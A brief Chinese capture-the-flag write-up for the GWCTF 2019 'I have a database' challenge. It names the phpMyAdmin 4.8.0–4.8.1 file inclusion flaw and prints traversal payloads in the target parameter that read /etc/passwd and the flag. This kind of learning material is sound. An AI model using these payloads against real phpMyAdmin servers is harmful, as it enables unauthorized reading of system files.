[GWCTF 2019]我有一个数据库
试题地址:https://buuoj.cn/challenges#[GWCTF 2019]我有一个数据库
参考链接:https://blog.csdn.net/BROTHERYY/article/details/107682948
- phpmyadmin4.8.0-4.8.1存在文件包含漏洞
使用网上的payload直接打
?target=db_datadict.php%253f/../../../../../../../../etc/passwd
?target=db_datadict.php%253f/../../../../../../../../flag //修改为flag就可以了
有什么错误或者改进意见欢迎评论或发给我噢!大家一起共同学习!大佬多指教!!!!